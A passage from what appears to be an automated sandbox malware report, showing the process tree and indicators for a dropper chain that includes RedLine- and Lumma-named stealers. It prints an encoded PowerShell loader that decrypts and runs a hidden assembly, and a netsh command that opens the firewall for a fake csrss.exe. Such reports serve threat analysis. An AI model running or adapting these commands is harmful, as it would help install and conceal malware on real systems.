keks.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	keks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exeexplorku.exeamers.exeaxplons.exeinstaller.exeRegAsm.exekeks.exeredline1.exeGameService.exeGameService.exeGameService.exeaxplons.exeexplorku.exepowershell.exe

pid	Process
2836	61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exe
2836	61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exe
652	explorku.exe
652	explorku.exe
2248	amers.exe
2248	amers.exe
2360	axplons.exe
2360	axplons.exe
4164	installer.exe
4164	installer.exe
5088	RegAsm.exe
5088	RegAsm.exe
3348	keks.exe
3348	keks.exe
3456	redline1.exe
3456	redline1.exe
4604	GameService.exe
4604	GameService.exe
5088	RegAsm.exe
5088	RegAsm.exe
3456	redline1.exe
3456	redline1.exe
3348	keks.exe
3348	keks.exe
4604	GameService.exe
4604	GameService.exe
4420	GameService.exe
4420	GameService.exe
4420	GameService.exe
4420	GameService.exe
808	GameService.exe
808	GameService.exe
4604	GameService.exe
4604	GameService.exe
324	axplons.exe
324	axplons.exe
528	explorku.exe
528	explorku.exe
808	GameService.exe
808	GameService.exe
4420	GameService.exe
4420	GameService.exe
808	GameService.exe
808	GameService.exe
4604	GameService.exe
4604	GameService.exe
4420	GameService.exe
4420	GameService.exe
808	GameService.exe
808	GameService.exe
4604	GameService.exe
4604	GameService.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
4420	GameService.exe
4420	GameService.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
808	GameService.exe
808	GameService.exe
4764	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

installer.exetrf.exekeks.exeredline1.exepowershell.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeregasm.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	4164	installer.exe
Token: SeDebugPrivilege	2288	trf.exe
Token: SeDebugPrivilege	3348	keks.exe
Token: SeDebugPrivilege	3456	redline1.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	5996	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Token: SeDebugPrivilege	5208	regasm.exe
Token: SeDebugPrivilege	5244	powershell.exe

Suspicious use of FindShellTrayWindow 9 IoCs

Processes:

61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exeamers.exeu1y8.1.exe

pid	Process
2836	61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exe
2248	amers.exe
3000	u1y8.1.exe
3000	u1y8.1.exe
3000	u1y8.1.exe
3000	u1y8.1.exe
3000	u1y8.1.exe
3000	u1y8.1.exe
3000	u1y8.1.exe

Suspicious use of SendNotifyMessage 7 IoCs

Processes:

u1y8.1.exe

pid	Process
3000	u1y8.1.exe
3000	u1y8.1.exe
3000	u1y8.1.exe
3000	u1y8.1.exe
3000	u1y8.1.exe
3000	u1y8.1.exe
3000	u1y8.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exeexplorku.exeamers.exeaxplons.exealex.exegold.exeRegAsm.exeinstall.exe3b9f6efab5.execmd.exe

description	pid	Process	procid_target
PID 2836 wrote to memory of 652	2836	61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exe	73
PID 2836 wrote to memory of 652	2836	61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exe	73
PID 2836 wrote to memory of 652	2836	61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exe	73
PID 652 wrote to memory of 1888	652	explorku.exe	74
PID 652 wrote to memory of 1888	652	explorku.exe	74
PID 652 wrote to memory of 1888	652	explorku.exe	74
PID 652 wrote to memory of 2248	652	explorku.exe	75
PID 652 wrote to memory of 2248	652	explorku.exe	75
PID 652 wrote to memory of 2248	652	explorku.exe	75
PID 2248 wrote to memory of 2360	2248	amers.exe	76
PID 2248 wrote to memory of 2360	2248	amers.exe	76
PID 2248 wrote to memory of 2360	2248	amers.exe	76
PID 652 wrote to memory of 3608	652	explorku.exe	77
PID 652 wrote to memory of 3608	652	explorku.exe	77
PID 652 wrote to memory of 3608	652	explorku.exe	77
PID 652 wrote to memory of 4164	652	explorku.exe	78
PID 652 wrote to memory of 4164	652	explorku.exe	78
PID 2360 wrote to memory of 2112	2360	axplons.exe	79
PID 2360 wrote to memory of 2112	2360	axplons.exe	79
PID 2360 wrote to memory of 2112	2360	axplons.exe	79
PID 2112 wrote to memory of 1272	2112	alex.exe	80
PID 2112 wrote to memory of 1272	2112	alex.exe	80
PID 2112 wrote to memory of 1272	2112	alex.exe	80
PID 2112 wrote to memory of 1272	2112	alex.exe	80
PID 2112 wrote to memory of 1272	2112	alex.exe	80
PID 2112 wrote to memory of 1272	2112	alex.exe	80
PID 2112 wrote to memory of 1272	2112	alex.exe	80
PID 2112 wrote to memory of 1272	2112	alex.exe	80
PID 2360 wrote to memory of 1868	2360	axplons.exe	83
PID 2360 wrote to memory of 1868	2360	axplons.exe	83
PID 2360 wrote to memory of 1868	2360	axplons.exe	83
PID 1868 wrote to memory of 4404	1868	gold.exe	85
PID 1868 wrote to memory of 4404	1868	gold.exe	85
PID 1868 wrote to memory of 4404	1868	gold.exe	85
PID 1868 wrote to memory of 2540	1868	gold.exe	123
PID 1868 wrote to memory of 2540	1868	gold.exe	123
PID 1868 wrote to memory of 2540	1868	gold.exe	123
PID 1868 wrote to memory of 2540	1868	gold.exe	123
PID 1868 wrote to memory of 2540	1868	gold.exe	123
PID 1868 wrote to memory of 2540	1868	gold.exe	123
PID 1868 wrote to memory of 2540	1868	gold.exe	123
PID 1868 wrote to memory of 2540	1868	gold.exe	123
PID 1868 wrote to memory of 2540	1868	gold.exe	123
PID 1272 wrote to memory of 3348	1272	RegAsm.exe	87
PID 1272 wrote to memory of 3348	1272	RegAsm.exe	87
PID 1272 wrote to memory of 3348	1272	RegAsm.exe	87
PID 1272 wrote to memory of 2288	1272	RegAsm.exe	88
PID 1272 wrote to memory of 2288	1272	RegAsm.exe	88
PID 2360 wrote to memory of 3456	2360	axplons.exe	90
PID 2360 wrote to memory of 3456	2360	axplons.exe	90
PID 2360 wrote to memory of 3456	2360	axplons.exe	90
PID 2360 wrote to memory of 4640	2360	axplons.exe	92
PID 2360 wrote to memory of 4640	2360	axplons.exe	92
PID 2360 wrote to memory of 4640	2360	axplons.exe	92
PID 4640 wrote to memory of 4900	4640	install.exe	93
PID 4640 wrote to memory of 4900	4640	install.exe	93
PID 4640 wrote to memory of 4900	4640	install.exe	93
PID 2360 wrote to memory of 356	2360	axplons.exe	138
PID 2360 wrote to memory of 356	2360	axplons.exe	138
PID 2360 wrote to memory of 356	2360	axplons.exe	138
PID 3608 wrote to memory of 4120	3608	3b9f6efab5.exe	97
PID 3608 wrote to memory of 4120	3608	3b9f6efab5.exe	97
PID 3608 wrote to memory of 4120	3608	3b9f6efab5.exe	97
PID 4900 wrote to memory of 4336	4900	cmd.exe	99

C:\Users\Admin\AppData\Local\Temp\61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exe
"C:\Users\Admin\AppData\Local\Temp\61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2836
- C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
  "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:652
- - C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
    "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
    3⤵
    PID:1888
- - C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
    "C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2248
  - - C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
      "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2360
    - - C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2112
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1272
        
        C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
        7⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3348
        
        C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2288
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 504
        6⤵
        Program crash
        
        PID:4648
    - - C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1868
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4404
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:2540
    - - C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3456
    - - C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:4640
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4900
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        7⤵
        Launches sc.exe
        
        PID:4336
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        7⤵
        Executes dropped EXE
        
        PID:4528
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        7⤵
        Launches sc.exe
        
        PID:1716
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        7⤵
        Executes dropped EXE
        
        PID:3400
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        7⤵
        Executes dropped EXE
        
        PID:4452
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        7⤵
        Executes dropped EXE
        
        PID:4060
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
        6⤵
        
        PID:4528
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        7⤵
        Launches sc.exe
        
        PID:4760
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        7⤵
        Executes dropped EXE
        
        PID:4412
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        7⤵
        Launches sc.exe
        
        PID:3644
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        7⤵
        Executes dropped EXE
        
        PID:2248
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        7⤵
        Executes dropped EXE
        
        PID:3400
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        7⤵
        Executes dropped EXE
        
        PID:2540
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
        6⤵
        
        PID:1176
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        7⤵
        Launches sc.exe
        
        PID:4108
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        7⤵
        Executes dropped EXE
        
        PID:4132
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        7⤵
        Executes dropped EXE
        
        PID:1092
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLinks
        7⤵
        Executes dropped EXE
        
        PID:4340
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
        6⤵
        
        PID:2132
    - - C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:356
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5088
    - - C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:224
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:3952
    - - C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"
        5⤵
        Executes dropped EXE
        
        PID:1912
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIAAdZ7GCFVn+YiAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJACFaLGCLAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJADgf/l6LAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAA9hPZTCgAgACAAIAAgACkACgAKACAAIAAgACAAJADOmF17IAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAIAAgACAAIAAkAM6YXXsuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJADOmF17LgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJAA1dDZ0IAA9ACAAJADOmF17LgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQAhWixgiwAIAAkAOB/+XopAAoAIAAgACAAIAAkANiY6pYgAD0AIAAkADV0NnQuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAD2E9lMsACAAMAAsACAAJAA9hPZTLgBMAGUAbgBnAHQAaAApAAoACgAgACAAIAAgACQAzphdey4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJADYmOqWCgB9AAoACgAkAENosYIgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAGkAdgBpAG4ANwA1ADYAbgB5AC4AdABtAHAAJwA7AAoAJACyg7GCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAENosYIpADsACgAKACQAhWixgiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAMwAsADAAeAAyADEALAAwAHgARgBEACwAMAB4AEEARAAsADAAeAAxAEEALAAwAHgANQA0ACwAMAB4ADYARAAsADAAeAA2ADQALAAwAHgAQgBDACwAMAB4ADkARQAsADAAeAAzAEEALAAwAHgAQwBFACwAMAB4AEMAMAAsADAAeAA1AEQALAAwAHgAOQBCACwAMAB4AEMAMQAsADAAeAA3AEEALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABGADUALAAwAHgARABCACwAMAB4ADcAMQAsADAAeABBADIALAAwAHgAMAAzACwAMAB4ADIAOAAsADAAeAAzAEYALAAwAHgARQBEACwAMAB4ADIAQwAsADAAeAA0ADAALAAwAHgARABEACwAMAB4ADUAMQAsADAAeAAxAEMAKQAKACQA4H/5eiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADAARQAsADAAeAA3ADkALAAwAHgAMQA1ACwAMAB4AEEAMQAsADAAeABEADkALAAwAHgAOQBBACwAMAB4ADMARgAsADAAeABGAEEALAAwAHgAMwA1ACwAMAB4ADEAQgAsADAAeAA5ADEALAAwAHgARgAzACwAMAB4ADQAMQAsADAAeABFADQALAAwAHgAMAA0ACwAMAB4ADMARQApAAoACgAkAD2E9lMgAD0AIAAdZ7GCFVn+YiAALQCFaLGCIAAkAIVosYIgAC0A4H/5eiAAJADgf/l6IAAtAD2E9lMgACQAsoOxggoACgAkALKEbFHxgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQAPYT2UykAKQA7AAoAJADLeUNTIAA9ACAAJACyhGxR8YIuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAy3lDUy4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgAKAA=="
        6⤵
        
        PID:2392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIAAdZ7GCFVn+YiAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJACFaLGCLAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJADgf/l6LAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAA9hPZTCgAgACAAIAAgACkACgAKACAAIAAgACAAJADOmF17IAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAIAAgACAAIAAkAM6YXXsuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJADOmF17LgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJAA1dDZ0IAA9ACAAJADOmF17LgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQAhWixgiwAIAAkAOB/+XopAAoAIAAgACAAIAAkANiY6pYgAD0AIAAkADV0NnQuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAD2E9lMsACAAMAAsACAAJAA9hPZTLgBMAGUAbgBnAHQAaAApAAoACgAgACAAIAAgACQAzphdey4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJADYmOqWCgB9AAoACgAkAENosYIgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAGkAdgBpAG4ANwA1ADYAbgB5AC4AdABtAHAAJwA7AAoAJACyg7GCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAENosYIpADsACgAKACQAhWixgiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAMwAsADAAeAAyADEALAAwAHgARgBEACwAMAB4AEEARAAsADAAeAAxAEEALAAwAHgANQA0ACwAMAB4ADYARAAsADAAeAA2ADQALAAwAHgAQgBDACwAMAB4ADkARQAsADAAeAAzAEEALAAwAHgAQwBFACwAMAB4AEMAMAAsADAAeAA1AEQALAAwAHgAOQBCACwAMAB4AEMAMQAsADAAeAA3AEEALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABGADUALAAwAHgARABCACwAMAB4ADcAMQAsADAAeABBADIALAAwAHgAMAAzACwAMAB4ADIAOAAsADAAeAAzAEYALAAwAHgARQBEACwAMAB4ADIAQwAsADAAeAA0ADAALAAwAHgARABEACwAMAB4ADUAMQAsADAAeAAxAEMAKQAKACQA4H/5eiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADAARQAsADAAeAA3ADkALAAwAHgAMQA1ACwAMAB4AEEAMQAsADAAeABEADkALAAwAHgAOQBBACwAMAB4ADMARgAsADAAeABGAEEALAAwAHgAMwA1ACwAMAB4ADEAQgAsADAAeAA5ADEALAAwAHgARgAzACwAMAB4ADQAMQAsADAAeABFADQALAAwAHgAMAA0ACwAMAB4ADMARQApAAoACgAkAD2E9lMgAD0AIAAdZ7GCFVn+YiAALQCFaLGCIAAkAIVosYIgAC0A4H/5eiAAJADgf/l6IAAtAD2E9lMgACQAsoOxggoACgAkALKEbFHxgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQAPYT2UykAKQA7AAoAJADLeUNTIAA9ACAAJACyhGxR8YIuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAy3lDUy4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgAKAA==
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4764
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5208
        
        C:\Users\Admin\Pictures\N41fo8smcTtS1Wyi0KvKJiCG.exe
        
        "C:\Users\Admin\Pictures\N41fo8smcTtS1Wyi0KvKJiCG.exe"
        9⤵
        Executes dropped EXE
        
        PID:5696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4432
        
        C:\Users\Admin\Pictures\N41fo8smcTtS1Wyi0KvKJiCG.exe
        
        "C:\Users\Admin\Pictures\N41fo8smcTtS1Wyi0KvKJiCG.exe"
        10⤵
        
        PID:7960
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6848
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        11⤵
        
        PID:6628
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        12⤵
        Modifies Windows Firewall
        
        PID:2268
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2268
        
        C:\Users\Admin\Pictures\bgt5XHyfmw2KKbaH1wRzpx8B.exe
        
        "C:\Users\Admin\Pictures\bgt5XHyfmw2KKbaH1wRzpx8B.exe"
        9⤵
        Executes dropped EXE
        
        PID:5440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6836
        
        C:\Users\Admin\Pictures\bgt5XHyfmw2KKbaH1wRzpx8B.exe
        
        "C:\Users\Admin\Pictures\bgt5XHyfmw2KKbaH1wRzpx8B.exe"
        10⤵
        
        PID:7900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5708
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        11⤵
        
        PID:7072
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        12⤵
        Modifies Windows Firewall
        
        PID:7556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5224
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:4108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6428
        
        C:\Users\Admin\Pictures\eh3nceepcFL8F4a9sIbYDI3p.exe
        
